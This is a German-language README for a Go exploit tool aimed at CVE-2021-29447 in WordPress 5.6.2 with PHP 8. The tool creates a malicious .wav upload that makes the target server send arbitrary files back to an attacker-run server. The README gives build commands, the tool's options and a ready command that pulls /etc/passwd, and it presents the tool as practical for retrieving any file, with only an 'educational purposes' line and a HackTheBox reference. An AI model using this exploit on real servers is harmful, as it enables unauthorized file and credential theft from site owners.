
Go-basierter Exploit für CVE-2021-29447, der WordPress 5.6.2 mit PHP 8 angreift. Erzeugt eine schädliche .wav-Nutzlast, um beliebige Dateien vom Server über den Media-Upload abzurufen, wobei ein Basis-wp-admin-Zugriff erforderlich ist.
Nur zu Bildungszwecken.
Dieser Exploit ist als praktisches Tool gedacht, um jede beliebige Datei von einem Server zu erhalten, der WordPress 5.6.2 und PHP 8 ausführt (siehe https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5).
Du benötigst lediglich Basis-WP-Admin-Zugriff und die Möglichkeit, eine Mediendatei hochzuladen.
Der Exploit generiert eine .wav-Datei als Payload, die über wp-admin hochgeladen wird.
Anschließend nutzt der Exploit den eigenen Back-Server, um dir die gewünschte Datei direkt in der Konsole auszuliefern.
Die perfekte Anwendung ist die HackTheBox-Maschine - metatwo https://www.hackthebox.com/machines/metatwo

$ go build
$ chmod +x exploit_cve-2021-29447
$ ./exploit_cve-2021-29447 --help
Usage of ./exploit_cve-2021-29447:
-local-server-ip string
Use local server ip where a local server will be set
-local-server-port int
Use local server port to run local server on
-o string
Output file to save exploit's result
-target-path string
Use target path to point on file you want to get from target server
$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd